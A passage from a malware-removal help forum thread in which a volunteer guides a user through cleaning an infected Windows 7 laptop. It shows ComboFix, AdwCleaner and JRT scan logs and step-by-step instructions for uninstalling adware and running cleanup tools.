REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"swg"="c:\program files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2011-05-18 39408]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"SVPWUTIL"="c:\program files (x86)\TOSHIBA\Utilities\SVPWUTIL.exe" [2010-11-09 532480]
"HWSetup"="c:\program files\TOSHIBA\Utilities\HWSetup.exe" [2010-03-04 423936]
"KeNotify"="c:\program files (x86)\TOSHIBA\Utilities\KeNotify.exe" [2010-08-16 34160]
"ToshibaServiceStation"="c:\program files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe" [2010-11-29 1294712]
"hpqSRMon"="c:\program files (x86)\HP\Digital Imaging\bin\hpqSRMon.exe" [2008-07-22 150528]
"HP Software Update"="c:\program files (x86)\HP\HP Software Update\HPWuSchd2.exe" [2011-05-10 49208]
"TkBellExe"="c:\program files (x86)\real\realplayer\Update\realsched.exe" [2014-09-24 296520]
.
c:\users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Best Buy pc app.lnk - c:\programdata\Best Buy pc app\ClickOnceSetup.exe "c:\programdata\Best Buy pc app\Best Buy pc app.application" [2011-2-25 15776]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 RealPlayerUpdateSvc;RealPlayer Update Service;c:\program files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe;c:\program files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 intaud_WaveExtensible;Intel WiDi Audio Device;c:\windows\system32\drivers\intelaud.sys;c:\windows\SYSNATIVE\drivers\intelaud.sys [x]
R3 JMCR;JMCR;c:\windows\system32\DRIVERS\jmcr.sys;c:\windows\SYSNATIVE\DRIVERS\jmcr.sys [x]
R3 MyWiFiDHCPDNS;Wireless PAN DHCP Server;c:\program files\Intel\WiFi\bin\PanDhcpDns.exe;c:\program files\Intel\WiFi\bin\PanDhcpDns.exe [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys;c:\windows\SYSNATIVE\drivers\TsUsbGD.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe;c:\program files\Windows Live\Mesh\wlcrasvc.exe [x]
S0 SymDS;Symantec Data Store;c:\windows\system32\drivers\N360x64\1506000.020\SYMDS64.SYS;c:\windows\SYSNATIVE\drivers\N360x64\1506000.020\SYMDS64.SYS [x]
S0 SymEFA;Symantec Extended File Attributes;c:\windows\system32\drivers\N360x64\1506000.020\SYMEFA64.SYS;c:\windows\SYSNATIVE\drivers\N360x64\1506000.020\SYMEFA64.SYS [x]
S0 Thpdrv;TOSHIBA HDD Protection Driver;c:\windows\system32\DRIVERS\thpdrv.sys;c:\windows\SYSNATIVE\DRIVERS\thpdrv.sys [x]
S0 Thpevm;TOSHIBA HDD Protection - Shock Sensor Driver;c:\windows\system32\DRIVERS\Thpevm.SYS;c:\windows\SYSNATIVE\DRIVERS\Thpevm.SYS [x]
S0 tos_sps64;TOSHIBA tos_sps64 Service;c:\windows\system32\DRIVERS\tos_sps64.sys;c:\windows\SYSNATIVE\DRIVERS\tos_sps64.sys [x]
S1 BHDrvx64;BHDrvx64;c:\program files (x86)\Norton 360\NortonData\21.4.0.13\Definitions\BASHDefs\20141118.001\BHDrvx64.sys;c:\program files (x86)\Norton 360\NortonData\21.4.0.13\Definitions\BASHDefs\20141118.001\BHDrvx64.sys [x]
S1 ccSet_N360;N360 Settings Manager;c:\windows\system32\drivers\N360x64\1506000.020\ccSetx64.sys;c:\windows\SYSNATIVE\drivers\N360x64\1506000.020\ccSetx64.sys [x]
S1 IDSVia64;IDSVia64;c:\program files (x86)\Norton 360\NortonData\21.4.0.13\Definitions\IPSDefs\20141202.001\IDSvia64.sys;c:\program files (x86)\Norton 360\NortonData\21.4.0.13\Definitions\IPSDefs\20141202.001\IDSvia64.sys [x]
S1 SymIRON;Symantec Iron Driver;c:\windows\system32\drivers\N360x64\1506000.020\Ironx64.SYS;c:\windows\SYSNATIVE\drivers\N360x64\1506000.020\Ironx64.SYS [x]
S1 SymNetS;Symantec Network Security WFP Driver;c:\windows\System32\Drivers\N360x64\1506000.020\SYMNETS.SYS;c:\windows\SYSNATIVE\Drivers\N360x64\1506000.020\SYMNETS.SYS [x]
S2 DMAgent;Intel® PROSet/Wireless WiMAX Red Bend Device Management Service;c:\program files\Intel\WiMAX\Bin\DMAgent.exe;c:\program files\Intel\WiMAX\Bin\DMAgent.exe [x]
S2 N360;Norton 360;c:\program files (x86)\Norton 360\Engine\21.6.0.32\N360.exe;c:\program files (x86)\Norton 360\Engine\21.6.0.32\N360.exe [x]
S2 RealNetworks Downloader Resolver Service;RealNetworks Downloader Resolver Service;c:\program files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe;c:\program files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [x]
S2 RealPlayer Cloud Service;RealPlayer Cloud Service;c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe;c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe [x]
S2 RosettaStoneDaemon;RosettaStoneDaemon;c:\program files (x86)\RosettaStoneLtdServices\RosettaStoneDaemon.exe;c:\program files (x86)\RosettaStoneLtdServices\RosettaStoneDaemon.exe [x]
S2 TOSHIBA eco Utility Service;TOSHIBA eco Utility Service;c:\program files\TOSHIBA\TECO\TecoService.exe;c:\program files\TOSHIBA\TECO\TecoService.exe [x]
S2 TVALZFL;TOSHIBA ACPI-Based Value Added Logical and General Purpose Device Filter Driver;c:\windows\system32\DRIVERS\TVALZFL.sys;c:\windows\SYSNATIVE\DRIVERS\TVALZFL.sys [x]
S2 UNS;Intel® Management and Security Application User Notification Service;c:\program files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe;c:\program files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe [x]
S2 WiMAXAppSrv;Intel® PROSet/Wireless WiMAX Service;c:\program files\Intel\WiMAX\Bin\AppSrv.exe;c:\program files\Intel\WiMAX\Bin\AppSrv.exe [x]
S3 bpenum;Intel® Centrino® WiMAX Enumerator;c:\windows\system32\DRIVERS\bpenum.sys;c:\windows\SYSNATIVE\DRIVERS\bpenum.sys [x]
S3 bpmp;Intel® Centrino® WiMAX 6050 Series;c:\windows\system32\DRIVERS\bpmp.sys;c:\windows\SYSNATIVE\DRIVERS\bpmp.sys [x]
S3 bpusb;Intel® Centrino® WiMAX 6050 Series Function Driver;c:\windows\system32\Drivers\bpusb.sys;c:\windows\SYSNATIVE\Drivers\bpusb.sys [x]
S3 CeKbFilter;CeKbFilter;c:\windows\system32\DRIVERS\CeKbFilter.sys;c:\windows\SYSNATIVE\DRIVERS\CeKbFilter.sys [x]
S3 EraserUtilRebootDrv;EraserUtilRebootDrv;c:\program files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys;c:\program files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [x]
S3 IntcDAud;Intel® Display Audio;c:\windows\system32\DRIVERS\IntcDAud.sys;c:\windows\SYSNATIVE\DRIVERS\IntcDAud.sys [x]
S3 iwdbus;IWD Bus Enumerator;c:\windows\system32\DRIVERS\iwdbus.sys;c:\windows\SYSNATIVE\DRIVERS\iwdbus.sys [x]
S3 nusb3hub;Renesas Electronics USB 3.0 Hub Driver;c:\windows\system32\DRIVERS\nusb3hub.sys;c:\windows\SYSNATIVE\DRIVERS\nusb3hub.sys [x]
S3 nusb3xhc;Renesas Electronics USB 3.0 Host Controller Driver;c:\windows\system32\DRIVERS\nusb3xhc.sys;c:\windows\SYSNATIVE\DRIVERS\nusb3xhc.sys [x]
S3 PGEffect;Pangu effect driver;c:\windows\system32\DRIVERS\pgeffect.sys;c:\windows\SYSNATIVE\DRIVERS\pgeffect.sys [x]
S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys;c:\windows\SYSNATIVE\DRIVERS\Rt64win7.sys [x]
S3 TMachInfo;TMachInfo;c:\program files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe;c:\program files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe [x]
S3 TOSHIBA HDD SSD Alert Service;TOSHIBA HDD SSD Alert Service;c:\program files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe;c:\program files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe [x]
S3 TPCHSrv;TPCH Service;c:\program files\TOSHIBA\TPHM\TPCHSrv.exe;c:\program files\TOSHIBA\TPHM\TPCHSrv.exe [x]
S3 wdkmd;Intel WiDi KMD;c:\windows\system32\DRIVERS\WDKMD.sys;c:\windows\SYSNATIVE\DRIVERS\WDKMD.sys [x]
.
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\svchost]
hpdevmgmt REG_MULTI_SZ    hpqcxs08 hpqddsvc
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-11-27 12:36 1087304 ----a-w- c:\program files (x86)\Google\Chrome\Application\39.0.2171.71\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-12-03 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-17 17:22]
.
2014-12-03 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2011-05-18 01:22]
.
2014-12-03 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2011-05-18 01:22]
.
2014-12-03 c:\windows\Tasks\ReclaimerUpdateFiles_Owner.job
- c:\users\Owner\AppData\Roaming\Real\Update\UpgradeHelper\RealPlayer\11.03\agent\rnupgagent.exe [2014-11-22 00:33]
.
2014-12-03 c:\windows\Tasks\ReclaimerUpdateXML_Owner.job
- c:\users\Owner\AppData\Roaming\Real\Update\UpgradeHelper\RealPlayer\11.03\agent\rnupgagent.exe [2014-11-22 00:33]
.
2014-12-03 c:\windows\Tasks\RNUpgradeHelperLogonPrompt_Owner.job
- c:\users\Owner\AppData\Roaming\Real\Update\UpgradeHelper\RealPlayer\11.03\agent\rnupgagent.exe [2014-11-22 00:33]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ThpSrv"="c:\windows\system32\thpsrv" [X]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2011-04-08 167256]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2011-04-08 391000]
"Persistence"="c:\windows\system32\igfxpers.exe" [2011-04-08 418136]
"RtHDVBg"="c:\program files\Realtek\Audio\HDA\RAVBg64.exe" [2011-01-18 2188904]
"IntelWireless"="c:\program files\Common Files\Intel\WirelessCommon\iFrmewrk.exe" [2011-01-05 1933584]
"IntelWirelessWiMAX"="c:\program files\Intel\WiMAX\Bin\WiMAXCU.exe" [2011-03-02 1617920]
"TosSENotify"="c:\program files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe" [2010-12-08 710040]
"TosVolRegulator"="c:\program files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe" [2009-11-11 24376]
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
uStart Page = hxxp://www.google.com/
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = <local>
IE: Add to Google Photos Screensa&ver - c:\windows\system32\GPhotos.scr/200
IE: E&xport to Microsoft Excel - c:\progra~2\MICROS~1\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~2\MICROS~1\Office14\ONBttnIE.dll/105
Trusted Zone: avast.com\public
Trusted Zone: bleepingcomputer.com\www
Trusted Zone: freeinstallfree.com\e0e57e9dbf80077061a89b8f58d2e6c8
Trusted Zone: freeinstallfree.com\static
Trusted Zone: intuit.com\ttlc
Trusted Zone: jefferson-bank.com\www
Trusted Zone: startpagea.com\cdn
Trusted Zone: viglink.com\api
Trusted Zone: whatthetech.com\forums
TCP: DhcpNameServer = 192.168.0.1 205.171.203.226
TCP: Interfaces\{C26C072B-4739-4C0D-B7F1-F4190F08DC70}: NameServer = 0.0.0.0
DPF: Garmin Communicator Plug-In - hxxps://static.garmincdn.com/gcp/ie/4.0.4.0/GarminAxControl_32.CAB
.
- - - - ORPHANS REMOVED - - - -
.
Toolbar-Locked - (no file)
Wow6432Node-HKLM-Run-TSleepSrv - %ProgramFiles(x86)%\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe
Wow6432Node-HKLM-Run-HP Update 4300C - c:\sj657\hpupdate.exe
HKLM_Wow6432Node-ActiveSetup-{2D46B6DC-2207-486B-B523-A557E6D54B47} - start
Toolbar-Locked - (no file)
HKLM-Run-TPwrMain - c:\program files (x86)\TOSHIBA\Power Saver\TPwrMain.EXE
HKLM-Run-HSON - c:\program files (x86)\TOSHIBA\TBS\HSON.exe
HKLM-Run-TCrdMain - c:\program files (x86)\TOSHIBA\FlashCards\TCrdMain.exe
HKLM-Run-SynTPEnh - c:\program files (x86)\Synaptics\SynTP\SynTPEnh.exe
HKLM-Run-Teco - c:\program files (x86)\TOSHIBA\TECO\Teco.exe
HKLM-Run-TosWaitSrv - c:\program files (x86)\TOSHIBA\TPHM\TosWaitSrv.exe
HKLM-Run-TosNC - c:\program files (x86)\Toshiba\BulletinBoard\TosNcCore.exe
HKLM-Run-TosReelTimeMonitor - c:\program files (x86)\TOSHIBA\ReelTime\TosReelTimeMonitor.exe
AddRemove-UpdaterEX - c:\users\Owner\AppData\Roaming\UpdaterEX\UpdateProc\UpdateTask.exe
.
.
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\services\N360]
"ImagePath"="\"c:\program files (x86)\Norton 360\Engine\21.6.0.32\N360.exe\" /s \"N360\" /m \"c:\program files (x86)\Norton 360\Engine\21.6.0.32\diMaster.dll\" /prefetch:1"
"ImagePath"="\SystemRoot\System32\Drivers\N360x64\1506000.020\SYMNETS.SYS"
"TrustedImagePaths"="c:\program files (x86)\Norton 360\Engine\21.6.0.32;c:\program files (x86)\Norton 360\Engine64\21.6.0.32"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\windows\\system32\\Macromed\\Flash\\FlashUtil64_15_0_0_239_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\windows\\system32\\Macromed\\Flash\\FlashUtil64_15_0_0_239_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_15_0_0_239_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_15_0_0_239_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_239.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.15"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_239.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_239.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_239.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}]
@Denied: (A) (Everyone)
"Solution"="{15727DE6-F92D-4E46-ACB4-0E2C58B31A18}"
.
[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Schema Library\ActionsPane3]
@Denied: (A) (Everyone)
.
[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Schema Library\ActionsPane3\0]
"Key"="ActionsPane3"
"Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\ActionsPane3.xsd"
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-12-02  21:39:44
ComboFix-quarantined-files.txt  2014-12-03 03:39
.
Pre-Run: 508,067,086,336 bytes free
Post-Run: 506,822,668,288 bytes free
.
- - End Of File - - 49B9D2876BDBD5958BEECCC4300AF9CA
 




#11 suefiza


Posted 02 December 2014 - 10:05 PM

TDSSKiller has been run.  The first log looks like it was a false start because I got the request to reboot.  The log that is attached is the 2nd log, the one that looks like the actual scan.  If you need the 1st log, let me know and I will attach it as well.



#12 suefiza


Posted 02 December 2014 - 10:09 PM

Attached File  TDSSKiller.3.0.0.41_02.12.2014_21.53.09_log.txt   796.96KB   92 downloads



#13 LiquidTension


Posted 03 December 2014 - 12:22 AM

Hi Sue, 
 

It looks like after it completed, all the way this time, it removed the fixlist.txt that had been on my desktop.

That's OK. The fix ran successfully, and removed the main infection present. 
 
Please work your way through the following steps. 
 
STEP 1
Uninstall Software

  • Press the Windows Key + r on your keyboard at the same time. Type appwiz.cpl and click OK.
  • Search for the following programmes, right-click and click Uninstall.
  • Note: Ensure you decline offers of additional software if applicable.
    • Extended Update
    • Yahoo! Toolbar
  • Follow the prompts.
  • Reboot if necessary.
     

STEP 2
AdwCleaner

  • Please download AdwCleaner and save the file to your Desktop.
  • Right-Click AdwCleaner.exe and select Run as administrator to run the programme.
  • Follow the prompts. 
  • Click Scan
  • Upon completion, click Report. A log (AdwCleaner[R0].txt) will open. Briefly check the log for anything you know to be legitimate. 
  • Ensure anything you know to be legitimate does not have a checkmark, and click Clean
  • Follow the prompts and allow your computer to reboot
  • After rebooting, a log (AdwCleaner[S0].txt) will open. Copy the contents of the log and paste in your next reply.

-- File and folder backups are made for anything removed using this tool. Should a legitimate file or folder be removed (otherwise known as a 'false-positive'), simple steps can be taken to restore the entry. Please do not overly concern yourself with the contents of AdwCleaner[R0].txt.
 

STEP 3
Junkware Removal Tool (JRT)

  • Please download Junkware Removal Tool and save the file to your Desktop.
  • Note: If you unchecked any items in AdwCleaner, please backup the associated folders/files before running JRT.
  • Temporarily disable your anti-virus software. For instructions, please refer to the following link.
  • Right-Click JRT.exe and select Run as administrator to run the programme.
  • Follow the prompts and allow the scan to run uninterrupted. 
  • Upon completion, a log (JRT.txt) will open on your desktop.
  • Re-enable your anti-virus software.
  • Copy the contents of JRT.txt and paste in your next reply.
     

STEP 4
RogueKiller

  • Please download RogueKiller (x64) and save the file to your Desktop.
  • Close any running programmes.
  • Right-Click RogueKiller.exe and select Run as administrator to run the programme.
  • Allow the Prescan to complete. Upon completion, a window will open. Click Accept.
  • A browser window may open. Close the browser window.
  • Click [button image]. Upon completion, click [button image].
  • Close the programme. Do not fix anything!
  • A log (RKreport.txt) will open. Copy the contents of the log and paste in your next reply.
     

======================================================

STEP 5
Logs
In your next reply please include the following logs. Please be sure to copy and paste the requested logs, as well as provide information on any questions I may have asked.

  • Did the programme uninstall OK?
  • AdwCleaner[S0].txt
  • JRT.txt
  • RKreport.txt



#14 suefiza


Posted 04 December 2014 - 04:35 PM

Log after running ADWareClean

# AdwCleaner v4.103 - Report created 04/12/2014 at 16:24:23
# Updated 01/12/2014 by Xplode
# Database : 2014-12-03.1 [Live]
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Owner - OWNER-PC
# Running from : C:\Users\Owner\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****

***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\Tarma Installer
Folder Deleted : C:\ProgramData\PC Drivers HeadQuarters
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Driver Detective
Folder Deleted : C:\Program Files (x86)\PC Drivers HeadQuarters
Folder Deleted : C:\Users\Owner\AppData\Local\PackageAware
Folder Deleted : C:\Users\Owner\AppData\LocalLow\HPAppData
Folder Deleted : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk
File Deleted : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.wajam.com_0.localstorage

***** [ Scheduled Tasks ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk
Key Deleted : [x64] HKLM\SOFTWARE\Google\Chrome\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk
Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho
Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho.1
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{EA28B360-05E0-4F93-8150-02891F1D8D3C}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{80922EE0-8A76-46AE-95D5-BD3C3FE0708D}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{79FB5FC8-44B9-4AF5-BADD-CCE547F953E5}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DF7770F7-832F-4BDF-B144-100EDDD0C3AE}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Key Deleted : HKCU\Software\UpdaterEX
Key Deleted : HKLM\SOFTWARE\Conduit
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4640FDE1-B83A-4376-84ED-86F86BEE2D41}

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17420

-\\ Mozilla Firefox v

-\\ Google Chrome v39.0.2171.71

[C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://start.funmoods.com/results.php?f=4&a=axl&q={searchTerms}
[C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://search.aol.com/aol/search?q={searchTerms}
[C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
[C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://nortonsafe.search.ask.com/web?q={searchTerms}&o=APN10506&l=dis&prt=360&chn=retail&geo=US&ver=21&locale=en_US&gct=sb&qsrc=2869

*************************

AdwCleaner[R0].txt - [3182 octets] - [04/12/2014 16:20:45]
AdwCleaner[S0].txt - [3106 octets] - [04/12/2014 16:24:23]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [3166 octets] ##########



#15 suefiza


Posted 04 December 2014 - 04:47 PM

JRT log

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.4.0 (11.29.2014:1)
OS: Windows 7 Home Premium x64
Ran by Owner on Thu 12/04/2014 at 16:39:42.90
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

~~~ Services

 

~~~ Registry Values

 

~~~ Registry Keys

 

~~~ Files

